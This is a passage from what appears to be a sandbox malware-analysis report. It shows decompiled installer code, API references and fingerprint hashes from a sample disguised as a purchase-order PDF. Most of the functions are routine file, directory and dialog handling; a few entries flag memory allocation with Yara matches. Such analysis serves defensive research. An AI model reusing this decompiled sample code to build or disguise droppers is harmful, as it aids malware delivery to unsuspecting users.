                                            						_push(0xfffffffd);
                                            						goto L19;
                                            					} else {
                                            						 *0x420ef4 =  *0x420ef4 + 4;
                                            						_t36 = E00403479(_a4);
                                            						if(_t36 < 0) {
                                            							L21:
                                            							_t22 = _t36;
                                            						} else {
                                            							if(_a12 != 0) {
                                            								_t26 = _a4;
                                            								if(_t26 >= _a16) {
                                            									_t26 = _a16;
                                            								}
                                            								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                            								if(_t27 != 0) {
                                            									_t36 = _v8;
                                            									 *0x420ef4 =  *0x420ef4 + _t36;
                                            									goto L21;
                                            								} else {
                                            									goto L18;
                                            								}
                                            							} else {
                                            								if(_a4 <= 0) {
                                            									goto L21;
                                            								} else {
                                            									while(1) {
                                            										_t28 = _a4;
                                            										if(_a4 >= 0x4000) {
                                            											_t28 = 0x4000;
                                            										}
                                            										_v8 = _t28;
                                            										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
                                            										if(_t29 == 0) {
                                            											goto L18;
                                            										}
                                            										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
                                            										if(_t30 == 0) {
                                            											_push(0xfffffffe);
                                            											L19:
                                            											_pop(_t22);
                                            										} else {
                                            											_t31 = _v8;
                                            											_a4 = _a4 - _t31;
                                            											 *0x420ef4 =  *0x420ef4 + _t31;
                                            											_t36 = _t36 + _t31;
                                            											if(_a4 > 0) {
                                            												continue;
                                            											} else {
                                            												goto L21;
                                            											}
                                            										}
                                            										goto L22;
                                            									}
                                            									goto L18;
                                            								}
                                            							}
                                            						}
                                            					}
                                            				}
                                            				L22:
                                            				return _t22;
                                            			}















                                            0x00403375
                                            0x0040337e
                                            0x00403387
                                            0x0040338b
                                            0x00403396
                                            0x00403396
                                            0x0040339e
                                            0x004033a5
                                            0x004033b7
                                            0x004033be
                                            0x00403463
                                            0x00403463
                                            0x00000000
                                            0x004033c4
                                            0x004033c7
                                            0x004033d3
                                            0x004033d7
                                            0x00403471
                                            0x00403471
                                            0x004033dd
                                            0x004033e0
                                            0x0040343f
                                            0x00403445
                                            0x00403447
                                            0x00403447
                                            0x00403459
                                            0x00403461
                                            0x00403468
                                            0x0040346b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004033e2
                                            0x004033e5
                                            0x00000000
                                            0x004033eb
                                            0x004033f0
                                            0x004033f7
                                            0x004033fa
                                            0x004033fc
                                            0x004033fc
                                            0x00403409
                                            0x0040340c
                                            0x00403413
                                            0x00000000
                                            0x00000000
                                            0x0040341c
                                            0x00403423
                                            0x0040343b
                                            0x00403465
                                            0x00403465
                                            0x00403425
                                            0x00403425
                                            0x00403428
                                            0x0040342b
                                            0x00403431
                                            0x00403437
                                            0x00000000
                                            0x00403439
                                            0x00000000
                                            0x00403439
                                            0x00403437
                                            0x00000000
                                            0x00403423
                                            0x00000000
                                            0x004033f0
                                            0x004033e5
                                            0x004033e0
                                            0x004033d7
                                            0x004033be
                                            0x00403473
                                            0x00403476

                                            APIs
                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                            • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                            • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                            • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 69%
                                            			E00401389(signed int _a4) {
                                            				intOrPtr* _t6;
                                            				void* _t8;
                                            				void* _t10;
                                            				signed int _t11;
                                            				void* _t12;
                                            				signed int _t16;
                                            				signed int _t17;
                                            				void* _t18;
                                            
                                            				_t17 = _a4;
                                            				while(_t17 >= 0) {
                                            					_t6 = _t17 * 0x1c +  *0x42a290;
                                            					if( *_t6 == 1) {
                                            						break;
                                            					}
                                            					_push(_t6); // executed
                                            					_t8 = E00401434(); // executed
                                            					if(_t8 == 0x7fffffff) {
                                            						return 0x7fffffff;
                                            					}
                                            					_t10 = E0040136D(_t8);
                                            					if(_t10 != 0) {
                                            						_t11 = _t10 - 1;
                                            						_t16 = _t17;
                                            						_t17 = _t11;
                                            						_t12 = _t11 - _t16;
                                            					} else {
                                            						_t12 = _t10 + 1;
                                            						_t17 = _t17 + 1;
                                            					}
                                            					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                            						 *0x42924c =  *0x42924c + _t12;
                                            						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
                                            					}
                                            				}
                                            				return 0;
                                            			}











                                            0x0040138a
                                            0x004013fa
                                            0x0040139b
                                            0x004013a0
                                            0x00000000
                                            0x00000000
                                            0x004013a2
                                            0x004013a3
                                            0x004013ad
                                            0x00000000
                                            0x00401404
                                            0x004013b0
                                            0x004013b7
                                            0x004013bd
                                            0x004013be
                                            0x004013c0
                                            0x004013c2
                                            0x004013b9
                                            0x004013b9
                                            0x004013ba
                                            0x004013ba
                                            0x004013c9
                                            0x004013cb
                                            0x004013f4
                                            0x004013f4
                                            0x004013c9
                                            0x00000000

                                            APIs
                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                            • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                            • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                            • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00406A35(signed int _a4) {
                                            				struct HINSTANCE__* _t5;
                                            				signed int _t10;
                                            
                                            				_t10 = _a4 << 3;
                                            				_t8 =  *(_t10 + 0x40a410);
                                            				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                                            				if(_t5 != 0) {
                                            					L2:
                                            					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                                            				}
                                            				_t5 = E004069C5(_t8); // executed
                                            				if(_t5 == 0) {
                                            					return 0;
                                            				}
                                            				goto L2;
                                            			}





                                            0x00406a3d
                                            0x00406a40
                                            0x00406a47
                                            0x00406a4f
                                            0x00406a5b
                                            0x00000000
                                            0x00406a62
                                            0x00406a52
                                            0x00406a59
                                            0x00000000
                                            0x00406a6a
                                            0x00000000

                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                              • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                              • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                              • Part of subcall function 004069C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A2B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                            • String ID:
                                            • API String ID: 2547128583-0
                                            • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                            • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                            • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                            • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 68%
                                            			E00406158(WCHAR* _a4, long _a8, long _a12) {
                                            				signed int _t5;
                                            				void* _t6;
                                            
                                            				_t5 = GetFileAttributesW(_a4); // executed
                                            				asm("sbb ecx, ecx");
                                            				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                            				return _t6;
                                            			}





                                            0x0040615c
                                            0x00406169
                                            0x0040617e
                                            0x00406184

                                            APIs
                                            • GetFileAttributesW.KERNEL32(00000003,00403113,C:\Users\user\Desktop\PO-230821_pdf.exe,80000000,00000003), ref: 0040615C
                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: File$AttributesCreate
                                            • String ID:
                                            • API String ID: 415043291-0
                                            • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                            • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                            • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                            • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00405C16(WCHAR* _a4) {
                                            				int _t2;
                                            
                                            				_t2 = CreateDirectoryW(_a4, 0); // executed
                                            				if(_t2 == 0) {
                                            					return GetLastError();
                                            				}
                                            				return 0;
                                            			}




                                            0x00405c1c
                                            0x00405c24
                                            0x00000000
                                            0x00405c2a
                                            0x00000000

                                            APIs
                                            • CreateDirectoryW.KERNEL32(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                            • GetLastError.KERNEL32 ref: 00405C2A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: CreateDirectoryErrorLast
                                            • String ID:
                                            • API String ID: 1375471231-0
                                            • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                            • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                            • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                            • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 024507DA: GetSystemInfo.KERNEL32(?), ref: 024507F7
                                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 0245089D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocInfoNumaSystemVirtual
                                            • String ID:
                                            • API String ID: 449148690-0
                                            • Opcode ID: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                            • Instruction ID: 9dc9a02109270376a699bdc88facae04a3526a7e15a74165aa0ca3e95304e01b
                                            • Opcode Fuzzy Hash: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                            • Instruction Fuzzy Hash: 69F01878D44329BAEB207BF25C0AB6D76799F08701F10655B6DC0761C3DA7C46008EA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0040620A(void* _a4, void* _a8, long _a12) {
                                            				int _t7;
                                            				long _t11;
                                            
                                            				_t11 = _a12;
                                            				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                            				if(_t7 == 0 || _t11 != _a12) {
                                            					return 0;
                                            				} else {
                                            					return 1;
                                            				}
                                            			}





                                            0x0040620e
                                            0x0040621e
                                            0x00406226
                                            0x00000000
                                            0x0040622d
                                            0x00000000
                                            0x0040622f

                                            APIs
                                            • WriteFile.KERNEL32(?,00000000,00000000,00000000,00000000,00412588,0040CEF0,00403579,0040CEF0,00412588,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                            • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                            • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004061DB(void* _a4, void* _a8, long _a12) {
                                            				int _t7;
                                            				long _t11;
                                            
                                            				_t11 = _a12;
                                            				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                            				if(_t7 == 0 || _t11 != _a12) {
                                            					return 0;
                                            				} else {
                                            					return 1;
                                            				}
                                            			}





                                            0x004061df
                                            0x004061ef
                                            0x004061f7
                                            0x00000000
                                            0x004061fe
                                            0x00000000
                                            0x00406200

                                            APIs
                                            • ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                            • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                            • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                            • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004035F8(long _a4) {
                                            				long _t2;
                                            
                                            				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                            				return _t2;
                                            			}




                                            0x00403606
                                            0x0040360c

                                            APIs
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                            • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                            • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                            • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,17D78400,00003000,00000004), ref: 02450777
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                            • Instruction ID: 7cb1cf57793e3a4fa8d11d744a7c2efed3a40adc2ddf2cf14d238e6e81d47735
                                            • Opcode Fuzzy Hash: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                            • Instruction Fuzzy Hash: 80113674D00228AFDB10EFA8CC49BAEBBB5EB08304F209496E940B7292D3714A40CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 95%
                                            			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                            				struct HWND__* _v8;
                                            				long _v12;
                                            				struct tagRECT _v28;
                                            				void* _v36;
                                            				signed int _v40;
                                            				int _v44;
                                            				int _v48;
                                            				signed int _v52;
                                            				int _v56;
                                            				void* _v60;
                                            				void* _v68;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				struct HWND__* _t94;
                                            				long _t95;
                                            				int _t100;
                                            				void* _t108;
                                            				intOrPtr _t130;
                                            				struct HWND__* _t134;
                                            				int _t156;
                                            				int _t159;
                                            				struct HMENU__* _t164;
                                            				struct HWND__* _t168;
                                            				struct HWND__* _t169;
                                            				int _t171;
                                            				void* _t172;
                                            				short* _t173;
                                            				short* _t175;
                                            				int _t177;
                                            
                                            				_t169 =  *0x429244;
                                            				_t156 = 0;
                                            				_v8 = _t169;
                                            				if(_a8 != 0x110) {
                                            					if(_a8 == 0x405) {
                                            						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                            					}
                                            					if(_a8 != 0x111) {
                                            						L17:
                                            						_t171 = 1;
                                            						if(_a8 != 0x404) {
                                            							L25:
                                            							if(_a8 != 0x7b) {
                                            								goto L20;
                                            							}
                                            							_t94 = _v8;
                                            							if(_a12 != _t94) {
                                            								goto L20;
                                            							}
                                            							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                            							_a8 = _t95;
                                            							if(_t95 <= _t156) {
                                            								L36:
                                            								return 0;
                                            							}
                                            							_t164 = CreatePopupMenu();
                                            							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
                                            							_t100 = _a16;
                                            							_t159 = _a16 >> 0x10;
                                            							if(_a16 == 0xffffffff) {
                                            								GetWindowRect(_v8,  &_v28);
                                            								_t100 = _v28.left;
                                            								_t159 = _v28.top;
                                            							}
                                            							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                            								_v60 = _t156;
                                            								_v48 = 0x423748;
                                            								_v44 = 0x1000;
                                            								_a4 = _a8;
                                            								do {
                                            									_a4 = _a4 - 1;
                                            									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                            								} while (_a4 != _t156);
                                            								OpenClipboard(_t156);
                                            								EmptyClipboard();
                                            								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                            								_a4 = _t108;
                                            								_t172 = GlobalLock(_t108);
                                            								do {
                                            									_v48 = _t172;
                                            									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                            									 *_t173 = 0xd;
                                            									_t175 = _t173 + 2;
                                            									 *_t175 = 0xa;
                                            									_t172 = _t175 + 2;
                                            									_t156 = _t156 + 1;
                                            								} while (_t156 < _a8);
                                            								GlobalUnlock(_a4);
                                            								SetClipboardData(0xd, _a4);
                                            								CloseClipboard();
                                            							}
                                            							goto L36;
                                            						}
                                            						if( *0x42922c == _t156) {
                                            							ShowWindow( *0x42a268, 8);
                                            							if( *0x42a2ec == _t156) {
                                            								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
                                            							}
                                            							E0040459D(_t171);
                                            							goto L25;
                                            						}
                                            						 *0x421f18 = 2;
                                            						E0040459D(0x78);
                                            						goto L20;
                                            					} else {
                                            						if(_a12 != 0x403) {
                                            							L20:
                                            							return E0040462B(_a8, _a12, _a16);
                                            						}
                                            						ShowWindow( *0x429230, _t156);
                                            						ShowWindow(_t169, 8);
                                            						E004045F9(_t169);
                                            						goto L17;
                                            					}
                                            				}
                                            				_v52 = _v52 | 0xffffffff;
                                            				_v40 = _v40 | 0xffffffff;
                                            				_t177 = 2;
                                            				_v60 = _t177;
                                            				_v56 = 0;
                                            				_v48 = 0;
                                            				_v44 = 0;
                                            				asm("stosd");
                                            				asm("stosd");
                                            				_t130 =  *0x42a270;
                                            				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                            				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                            				 *0x429230 = GetDlgItem(_a4, 0x403);
                                            				 *0x429228 = GetDlgItem(_a4, 0x3ee);
                                            				_t134 = GetDlgItem(_a4, 0x3f8);
                                            				 *0x429244 = _t134;
                                            				_v8 = _t134;
                                            				E004045F9( *0x429230);
                                            				 *0x429234 = E00404F52(4);
                                            				 *0x42924c = 0;
                                            				GetClientRect(_v8,  &_v28);
                                            				_v52 = _v28.right - GetSystemMetrics(_t177);
                                            				SendMessageW(_v8, 0x1061, 0,  &_v60);
                                            				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                                            				if(_a8 >= 0) {
                                            					SendMessageW(_v8, 0x1001, 0, _a8);
                                            					SendMessageW(_v8, 0x1026, 0, _a8);
                                            				}
                                            				if(_a12 >= _t156) {
                                            					SendMessageW(_v8, 0x1024, _t156, _a12);
                                            				}
                                            				_push( *((intOrPtr*)(_a16 + 0x30)));
                                            				_push(0x1b);
                                            				E004045C4(_a4);
                                            				if(( *0x42a278 & 0x00000003) != 0) {
                                            					ShowWindow( *0x429230, _t156);
                                            					if(( *0x42a278 & 0x00000002) != 0) {
                                            						 *0x429230 = _t156;
                                            					} else {
                                            						ShowWindow(_v8, 8);
                                            					}
                                            					E004045F9( *0x429228);
                                            				}
                                            				_t168 = GetDlgItem(_a4, 0x3ec);
                                            				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                            				if(( *0x42a278 & 0x00000004) != 0) {
                                            					SendMessageW(_t168, 0x409, _t156, _a12);
                                            					SendMessageW(_t168, 0x2001, _t156, _a8);
                                            				}
                                            				goto L36;
                                            			}

































                                            0x00405811
                                            0x00405817
                                            0x00405821
                                            0x00405824
